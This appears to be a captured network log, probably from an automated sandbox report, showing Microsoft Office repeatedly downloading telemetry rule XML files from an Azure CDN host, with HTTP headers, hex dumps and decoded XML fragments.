                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582BEB6AD293"
                                                                                                                                                                                                                            x-ms-request-id: 09c80ed2-701e-003e-5d5f-2e79b3000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133944Z-17df447cdb5qkskwhC1DFWeeg400000002zg0000000055hh
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2024-11-06 13:39:44 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 63 75 72 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSecurity" S="Medium" /> <F T="2">


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            121192.168.2.56198613.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:44 UTC192OUTGET /rules/rule702801v1s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:44 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:44 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 1391
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582BDF58DC7E"
                                                                                                                                                                                                                            x-ms-request-id: 9314d04c-501e-00a3-4355-2ec0f2000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133944Z-17df447cdb5wrr5fhC1DFWte8n000000031g0000000058m8
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2024-11-06 13:39:44 UTC1391INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53
                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            122192.168.2.56198813.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:45 UTC192OUTGET /rules/rule702800v1s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:45 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:45 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 1354
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582BE0662D7C"
                                                                                                                                                                                                                            x-ms-request-id: b30de5cd-801e-00ac-33e1-2ffd65000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133945Z-17df447cdb5t94hvhC1DFWw97800000002zg000000009rpz
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2024-11-06 13:39:45 UTC1354INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f
                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S="Medium" /> <F T="2"> <O


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            123192.168.2.56199013.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:45 UTC192OUTGET /rules/rule703351v0s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:45 UTC538INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:45 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 1403
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582BDCDD6400"
                                                                                                                                                                                                                            x-ms-request-id: 4df37937-b01e-003d-35ab-2bd32c000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133945Z-16547b76f7fcjqqhhC1DFWrrrc00000006mg00000000dqhp
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2024-11-06 13:39:45 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703351" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            124192.168.2.56199113.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:45 UTC192OUTGET /rules/rule703350v0s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:45 UTC517INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:45 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 1366
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:42 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582BDF1E2608"
                                                                                                                                                                                                                            x-ms-request-id: 3018dd1c-101e-008d-1bd2-2c92e5000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133945Z-16547b76f7frbg6bhC1DFWr54000000006p0000000006ks4
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2024-11-06 13:39:45 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 63 72 69 70 74 4c 61 62 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703350" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenScriptLab" S="Medium" /> <F T="2


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            125192.168.2.56199213.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:45 UTC192OUTGET /rules/rule703501v0s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:45 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:45 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 1399
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:59 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582BE8C605FF"
                                                                                                                                                                                                                            x-ms-request-id: e4da4b19-701e-0097-0658-2eb8c1000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133945Z-17df447cdb5qkskwhC1DFWeeg400000002y0000000008geu
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2024-11-06 13:39:45 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61
                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703501" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSa


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            126192.168.2.56199413.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:46 UTC192OUTGET /rules/rule703500v0s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:46 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:46 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 1362
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582BDF497570"
                                                                                                                                                                                                                            x-ms-request-id: 161ed898-101e-0017-1055-2e47c7000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133946Z-15869dbbcc68l9dbhC1DFWc5xw00000001ng0000000021cz
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2024-11-06 13:39:46 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61 6e 64 62 6f 78 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703500" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSandbox" S="Medium" /> <F T="2">


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            127192.168.2.56199613.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:46 UTC192OUTGET /rules/rule701801v1s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:46 UTC538INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:46 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 1403
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582BDC2EEE03"
                                                                                                                                                                                                                            x-ms-request-id: 29f76c25-201e-0000-6fd2-2ca537000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133946Z-16547b76f7fj5p7mhC1DFWf8w400000006qg00000000g0h9
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2024-11-06 13:39:46 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            128192.168.2.56199813.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:46 UTC192OUTGET /rules/rule701051v1s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:46 UTC517INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:46 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 1399
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:47 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582BE1CC18CD"
                                                                                                                                                                                                                            x-ms-request-id: 4847cb37-401e-0016-7fd2-2c53e0000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133946Z-16547b76f7f76p6chC1DFWctqw00000006tg00000000a0yk
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2024-11-06 13:39:46 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65
                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRe


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            129192.168.2.56199713.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:46 UTC192OUTGET /rules/rule701800v1s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:46 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:46 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 1366
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582BEA414B16"
                                                                                                                                                                                                                            x-ms-request-id: fa0844ee-c01e-0082-40fb-2eaf72000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133946Z-17df447cdb5lrwcchC1DFWphes00000002z0000000004fmz
